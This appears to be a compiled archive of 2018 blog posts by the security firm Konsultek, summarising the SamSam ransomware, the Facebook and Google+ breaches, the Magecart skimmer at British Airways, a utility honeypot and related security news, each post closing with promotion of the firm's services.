Secret Sister Returns to Facebook Just in Time for the Holidays

If successful, the end result is the same. A few people at the top of the pyramid will receive hundreds of gifts that they can either keep or resell for cash while most participants end up with nothing.

Chain letter, pyramid scheme or gateway to identity theft, this is one holiday tradition you would be wise to avoid according to the Better Business Bureau and the Police.

From Post Office Plague to Social Media Manipulation

Back in the good old days chain letters such as the Secret Sister relied on the hopes and dreams of unwitting participants and the US Postal service. Today, the hopes and dreams are still required but the Post Office has been replaced by Facebook.

 

More Than Disappointing, It’s Illegal

Ok, so perhaps the prospect of spending $10 on a gift on the off-chance that the Secret Sister post you received from a relative or friend is “legit” holds some appeal and not a lot of downside. Well, that’s where you could be wrong. According to the US Postal Service:

There’s at least one problem with chain letters. They’re illegal if they request money or other items of value and promise a substantial return to the participants. Chain letters are a form of gambling, and sending them through the mail (or delivering them in person or by computer, but mailing money to participate) violates Title 18, United States Code, Section 1302, the Postal Lottery Statute. (Chain letters that ask for items of minor value, like picture postcards or recipes, may be mailed, since such items are not things of value within the meaning of the law.)

While the chance that your participation in a Secret Sister chain letter or chain post as it were will lead to any serious run ins with the law is pretty slim, perhaps even less likely than your actually receiving a gift, it’s noteworthy that the US Postal Inspection Service dedicates an entire page to chain letters!

Tis Better to Give Than Receive

Perhaps the real lesson here is that giving and sharing with others is what makes the Holiday Season so special. So go ahead and find ways to give to others that don’t involve a Secret Sister or similar chain concept and share and enrich the lives of friends, family and even complete strangers.

SaMSaM Held Atlanta Ransom. Who’s Next?

Image Source: SOPHOSLABS 2019 THREAT REPORT

Image Source: SOPHOSLABS 2019 THREAT REPORT

We’ve written quite a bit about municipalities large and small (think Atlanta, GA and Batavia, IL) becoming the focus of hackers and cybercriminals. Today we’ll shed a little more light on the malware that brought Atlanta to its knees in March.
SaMSaM for Ransom
Dubbed SaMSaM, researchers at Sophos have dedicated a portion of their SOPHOSLABS 2019 THREAT REPORT to this highly profitable group of malware maestros. Sophos describes SamSam’s highly personalized, hi-touch ransomware attacks as being akin to a “cat burglar” as opposed to the more “smash and grab” approach of automated ransomware attacks that utilize commodity ransomware such as GandCrab.

The Advantages of Being Hands-On
Rather than relying on automation to rapidly attack hundreds of systems at once and hoping that some sort of exploitable vulnerability surfaces, for nearly 3 years SamSam has applied an old school hands-on approach to infiltration and infection. It typically begins by brute-forcing RDP passwords, which ultimately leads to harvesting domain admin credentials. With these credentials in hand SamSam then waits for just the right moment, say Friday evening on a holiday weekend to strike – pushing out the malware to as many machines as possible simultaneously
This hi-touch, cat burglar approach has allowed SamSam to focus on vulnerable targets with deep pockets and has yielded known ransom payments totaling $6.5 Million USD in a little under 3 years.
Imitation is the Sincerest Form of Flattery
Even though the mysterious folks behind SamSam do not appear to collaborate, or even brag in forums, their high value exploits have not gone unnoticed and several impersonators have spawned such as the ultra-high ransom group BitPaymer which reportedly charges ransoms in the $50,000 to $1MM dollar range.
Konsultek’s Recommendation – Rein in RDP and Get the Fundamentals Locked Down
Since many of the worst manual ransomware attacks have relied upon Windows Remote Desktop as a point of entry it stands to reason making sure you have this potential avenue of ingress secured should be a top priority. Once this basic vulnerability is secured you should also make sure that your team is practicing good password management and keeping systems up to date and patched. Even the most sophisticated security solutions will be hamstrung if sloppy network hygiene virtually invites hackers in!
If you’d like a free visibility report to potential problems mentioned in this blog, please contact us immediately.

Is Automation the Key to Lower Incident Response Times?

This year’s SANS Endpoint Security Survey report is loaded with interesting statistics such as:

  • 42% of IT professionals acknowledged they had suffered a breach on their endpoints.
  • 20% said they did not know if they had been breached.
  • 82% of those that knew of a breach said it had involved a desktop.
  • 69% cited corporate laptops.
  • 42% cited employee-owned laptops.
  • 47% of antivirus capabilities detected threats.
  • 26% of breaches were detected by endpoint detection and response (EDR) capabilities.

It was this last response that was of particular interest, so we took a deeper dive.

Endpoints Up Response Times Down

One of the challenges facing security professionals is the seemingly ever expanding number of endpoints that need to be monitored. It’s akin to having an ever expanding fence line that needs to be patrolled and maintained by a rancher to prevent loss of livestock to predators.

 

Interestingly enough, despite the growth in endpoints this year’s report showed that incident response times are actually decreasing. One of the primary reasons for this is automated endpoint detections and response capabilities (EDR).

Are you Automated?

 

If you have purchased and fully implanted a next-gen EDR solution you can consider yourself and your organization firmly ahead of the curve.  As SANS Analyst and survey author Lee Neely states in the report:

 

“The diversity and quantity of endpoints in the modern enterprise are driving the need for more automation and predictive capabilities. While [organizations] are purchasing solutions to keep ahead of the emerging cyber threats, they appear to fall short on implementing the key purchased capabilities needed to protect and monitor the endpoint.”

In fact, to be more specific:

“Of the IT professionals that had acquired next-gen endpoint security solutions, 37% haven’t implemented their full capabilities”.

Let Konsultek Help You Automate

The SANS Incident Response Survey shows that the largest number of respondents had a “time to detect” between 6-24 hours, “time to contain” of 2-7 days and  finally a “time to remediate” of 2-7 days.  As security professionals looking to secure an ever more complex end-point “fence line” how do we accelerate the incident response time? The obvious answer is to use machine based automation.

Curious as to how that might work in your organization’s network? We’d be happy to explain! Just give us a call to discuss how a Konsultek custom security solution can take your organization to a whole new level of security.

 

Facebook Breathes Sigh of Relief as Google+ Glitch Draws Regulator Attention

A couple weeks back we reported that Facebook was in the cross-hairs of regulators and litigants around the world as a result of their latest breach. Well this week some of that unwanted attention was turned from Facebook to rival Google.

Google+ Attains “Me Too” Status with Breach

Google+ was a failed Facebook “me too” attempt from Google that never worked well, never threatened Facebook for market share and finally through its own security flaws finally reached parity or perhaps even bested Facebook at some level.

Should Have Shut it Down a Long Time Ago

The flaw, first brought to the public’s attention in an article on WSJ.com last week would have never happened had Google parent company Alphabet, Inc. performed some product line pruning years ago. It’s been clear for years to even the most casual observer that Google+ was a flop and would never gain widespread acceptance or use.

Instead, Google found itself with a 500,000 user vulnerability from 2015 until discovered earlier this year and decided to try to cover it up “in part because of fears that doing so would draw regulatory scrutiny and cause reputational damage.”  To their credit, Google fixed the breach immediately upon finding it, they just hoped no one would ever learn about its prior existence.

The Flaw

A Google internal review team discovered the API vulnerability which impacted approximately 500,000 accounts. The flaw allowed the API to grant access to information on a user’s profile which hadn’t been marked as public. Google sources state that access was granted to information such as name, occupation and age. Phone numbers and other more personal information stored on your Google account remained safe. We can only hope that this is true since all of your Google related properties from Gmail, to contacts to AdWords and YouTube are all linked together.

Taking Heat

The flaw, by today’s standards seems rather benign and spun correctly; Google might have come away smelling like the proverbial rose. Instead by covering it up they are drawing some serious heat from Congress.

  • Senators John Thune, Roger Wicker, and Jerry Moran, want answers. The trio sent a letterto Google CEO Sundar Pichai requesting information about the nature of the company’s response to the discovery of the glitch.
  • Senator Chuck Grassley (R-Iowa) wrote directly to Google CEO Sundar Pichaion Friday. Grassley pressed on why Google had declined to participate in earlier Congressional hearings in April that focused on Facebook.

Konsultek’s Take

Social networks such as Google+ and Facebook pose a tremendous threat to the privacy of individuals and corporations who choose to use them. The use of a single Google login to access multiple properties means that the breach of a singular system, in fact, represents the breach of potentially hundreds. Extreme caution with social media has always been advised and this latest breach drives that home. While convenient, using shared credentials for access should be avoided as a security best practice.

 

 

The Direct Simplicity of Hacking Cryptocurrency Exchanges for Cash

While many cybercriminals steal identities, credit card numbers and other personally identifiable information, there is a rapidly growing group of cyberthieves who are targeting something far more easily turned into profits – cryptocurrencies. Forget the arduous task of selling thousands, hundreds of thousands or even millions of pieces of information on the Darkweb. Instead, steal cryptocurrencies, exchange them for the hard currency of your choice and you are done!

 

2018 Crypto-Exchange Theft Up 250%… Already

According to the most recent report issued by CipherTrace $927 Million worth of cryptocurrencies have been stolen in the first 9 months of 2018, an increase of 250% over 2017 and we still have 3 more months left in the year.

Source: CipherTrace – 2018 Q3 Cryptocurrency Anti-Money Laundering Report

 

 

 

Will Regulation Help Slow Things Down?

Is the key to stopping exchange theft more than just improved security technology? Many believe that increased anti money laundering (AML) regulations hold at least part of the key to stopping exchange theft. Their rationale is that thieves need to exchange and launder their haul of illicit cryptos and most of this laundering is done through exchanges in countries with weak to no AML regulation as shown below.

For Facebook the Hacks Just Keep Getting Bigger

In an ironic twist that Mark Twain would have been proud of Facebook’s most recent and largest breach to date stems from a feature Facebook added to give users more control over their privacy!

“View As” Gives More Than a View

Two bugs in Facebook’s “view as” feature were exploited by hackers.  The flaws enabled them to get control of so-called Access Tokens, which allowed them to be logged in as genuine Facebook users without having to use their password. Ouch! I guess my 20 character randomly generated password wasn’t much of a deterrent when you have a backdoor like that!

All told, nearly 50 million user accounts were compromised on Facebook including those of Mark Zuckerberg himself and Sheryl Sandberg, Facebook’s COO. When you factor in that many people use their Facebook account to access other services such as Spotify, Tinder and hundreds of others, the extent of the compromised accounts grows to staggering.

Do We Have Your Attention Now?

Facebook was already arguably under more scrutiny than any other company for its past security transgressions such as those involving Cambridge Analytica and “Fake News” but this latest episode is sure to garner the attention of even more individuals, lawyers and regulators both here and abroad. Two individuals here in the US have already filed lawsuits that they hope will become class-action lawsuits.

GPDR Could Cost Billions

GPDR went into effect on May 25th of this year and that may have serious consequences for Facebook. If Facebook is found to be in breach of GPDR for failing to adequately protect user data they could be facing the largest security related fine in history. Under GPDR, a guilty party faces a fine of 20 Million Euro or 4% of revenue, whichever is larger. In this case, 4% of revenue represents a whopping $1.63 billion!

The Final Irony

Stories spread rapidly on Facebook. Real news and fake news alike and Facebook has taken tremendous heat for allowing fake news stories to proliferate across their platform. But, what is fake and what is real? And, with 2.2 billion users, who decides?

Well in the final ironic twist to this story Facebook was the one place you couldn’t learn about the latest breach. Why? So many users posted stories about the breach that Facebook’s spam filters thought the actions looked suspicious and removed them for looking like spam “fake news” stories!

Konsultek’s Take

Social networks such as Facebook pose a tremendous threat to the privacy of individuals and corporations who choose to use them. The use of a single Facebook login to access multiple properties means that the breach of a singular system, in fact, represents the breach of potentially hundreds. Extreme caution with social media has always been advised and this latest breach drives that home. While convenient, using shared credentials for access should be avoided as a security best practice.

22Line Code “Scalpel” to Removes British Airways Customer Data

A couple weeks ago British Airways confirmed that the personal data of 380,000 customers had been stolen.

Magecart Again. Still?

On September 11th the simplicity of this surgical strike was revealed by RiskIQ and the details are pretty amazing. According to RiskIQ the incident, which lasted 15 days, was very similar to the breach of Ticket Master UK earlier in the year. That similarity combined with crawl data allowed them to quickly confirm that the threat actors were one in the same, Magecart.

Magecart is a group of criminals that specialize in web based credit card skimmers. RiskIQ actively monitors 2 billion pages of the world wide web for Magecart activity and Magecart is so active that RiskIQ gets hourly notifications of sites being hacked!

The 22 Line Scalpel

In the case of the British Airways hack, Magecart slightly modified their code so it went unnoticed by the RiskIQ automated crawlers and only after the fact could RiskIQ manually identify their handiwork. It turned out that the 22 lines of javascript shown below is what excised the personal data of 380,000 customers.

The same code also appears to have affected the British Airways mobile app for the same period of time. This is because the app was developed as an empty shell that simply pulled in functionality from the desktop site. While past Magecart attacks grabbed form data indiscriminately, these 22 lines were highly targeted, extracting payment information and sending it off to their own servers.

Konsultek Knows Security

Threat prevention, detection and quarantine are the hallmarks of a robust security solution. If your current approach to network security is a patchwork quilt of boxes and software that has been cobbled together over time it’s probably time to have us perform a comprehensive review. Simply give us a call and we’ll schedule a time to chat. It’s really that easy to get started.

Power Transmission Substation Honeypot Yields Unexpected Results

We’ve discussed the security of critical infrastructure many times on this blog. From the hijacking of the Dallas, TX tornado warning system, to discussions at Davos, selfies revealing sensitive information and even a video showing a white hat hacker team physically compromising a substation security system.

The security of the nation’s critical infrastructure is, well, critical, so we were quite intrigued by a recent honeypot experiment conducted by researchers at Cybereason.

Honeypot Yields Unexpected Results

Looking to further understand the threats facing critical infrastructure Cybereason set up a honey pot late in Q2 2018 that emulated the network of a major electric provider’s power transmission substation. All significant network systems including an IT environment, an OT environment and HMI (human machine interface) management system were included in the honeypot to make it appear as legitimate a network as possible.

Gotcha!

Cybereason expected the honeypot to reveal attack vectors that targeted individuals with network access. Instead what they found was that the honeypot was compromised by a set of actors who sourced their access tools off a dark web forum!

According to Cybereason CISO Israel Barak, the honeypot infrastructure was first discovered by a black-market seller conducting a broad internet reconnaissance. “The seller was able to compromise a single machine in the honeypot and posted it for sale in a black market called xDedic – along with the network identifiers of the compromised environment, which disclosed its probable affiliation with a large utility provider.”

Dark Web = Lights Out?

While the genesis of the threat, purchasing access off the darkweb, was unexpected Cybereason believes that those using the purchased access are very familiar with ICS environments. They moved quickly from the honeypot’s IT environment into the OT (operational technology) environment which is the system environment that actually controls the equipment used to deliver the utility in question whether it be electricity, natural gas or water.  The attackers appear to have been singularly focused on getting to the OT network. And, while some of their techniques were sloppy and raised red flags that would have likely elicited a security team’s response, had they been left unchallenged for some reason it appears possible they would have achieved their goal.

Can We Help You Achieve Your Goals?

When it comes to security, having an end goal in mind makes sense. Let us help you discover what goals make sense for your organization. It’s simple to get started, we’re just a phone call away.

 

 

Cortana – Let’s Start Hacking!

Cortana –  Let’s Start Hacking!

If you’ve ever witnessed the breadth of friendly Alexa hijinks going on in the world you could predict that hackers exploiting voice command vulnerabilities would just be a matter of time.

Well, that time is now. Voice hacking is a real and growing threat according to a mounting body of evidence.

Open Sesame

Yesterday afternoon (8/8/18) attendees at Blackhat.com in Las Vegas were treated to a presentation by a group of Israeli students and researchers who revealed what they are calling the “Open Sesame” vulnerability of Cortana.

According to the session overview…

In this presentation, we will reveal the “Open Sesame” vulnerability, a much more powerful vulnerability in Cortana that allows attackers to take over a locked Windows machine and execute arbitrary code. Exploiting the “Open Sesame” vulnerability attackers can view the contents of sensitive files (text and media), browse arbitrary web sites, download and execute arbitrary executables from the Internet, and under some circumstances gain elevated privileges. To make matters even worse, exploiting the vulnerability does not involve ANY external code, nor shady system calls, hence making code focused defenses such as Antivirus, Anti-malware and IPS blind to the attack.

Hackers Never Sleep

As technology continues to integrate into every aspect of our lives we can expect new and different vulnerabilities to emerge. Unfortunately, the hacking and cyber-criminal community never sleeps when it comes to identifying and exploiting these vulnerabilities for their profit at your expense.

Konsultek Stands Vigil

That’s where Konsultek comes in. Our custom security solutions are based upon the most advanced architectures and tools available and stand guard 24x7x365 to keep your networks and information secure. If you are looking for a security partner that is constantly innovating and keeping ahead of the curve please give us a call. Konsultek – your vigilant security partner.

If you’re interested in a complimentary Executive Risk Assessment, just pick up the phone and give us a call to schedule your first step towards greater security.

You’ll understand where your most important digital assets are, what the impact and likelihood of an incident is, and how to protect those assets. Why wouldn’t you want to know something about your business you didn’t know for free!

Reporter Trolls the Russian Dark Web and Finds…

Reporter Trolls the Russian Dark Web and Finds…

Dylan Curran, writing for the Guardian, recently published a fascinating look at the world of Russian Dark Web hacking forums.

Knowledge is Power

You may recall that we took a look at dark web forums previously here, here and here. Well, in case you are under the false impression that the dark web has been scrubbed clean or had the bright light of justice shone upon it, you’ll be disappointed to learn that the dark web is not just alive, but thriving!

FreeHacks

Dylan’s deep dive was into just one of the larger hacking forums called FreeHacks which divides itself up into no less than 17 different hacking related sub-forums (granted, one of those sub-forums  is “Humor”) to meet the needs of its 5,000 or so members.

Unlike some of the sites we’ve chronicled in the past, FreeHacks is focused on education and sharing and in this way really highlights the difference in mindset between Russian hackers and those in Western countries.

Collaboration vs. Independence

On FreeHacks information and instruction on a very detailed and granular level are being openly shared for the greater good of the community. This is in contrast to Western hackers who are more apt to keep a lower profile, less openly sharing knowledge and less likely to collaborate with strangers in order to maintain as much anonymity (and competitive advantage?) as possible.

Konsultek Collaborates Too

At Konsultek we understand that the best security solutions come from collaborating with the top firms and brightest minds in the industry. That’s why we’re proud to partner with industry thought leaders at ForeScout, Checkpoint, SentinelOne, Gigamon, IntSIght and more. Are you looking to collaborate with a local leader with a global reach? Look no further! If you’re interested in a complimentary Risk Assessment, just pick up the phone and give us a call to schedule your first step towards greater security.

Understand where your most important digital assets are, what the impact and likelihood of an incident is, and how to protect those assets.

© Copyright 2018 Konsultek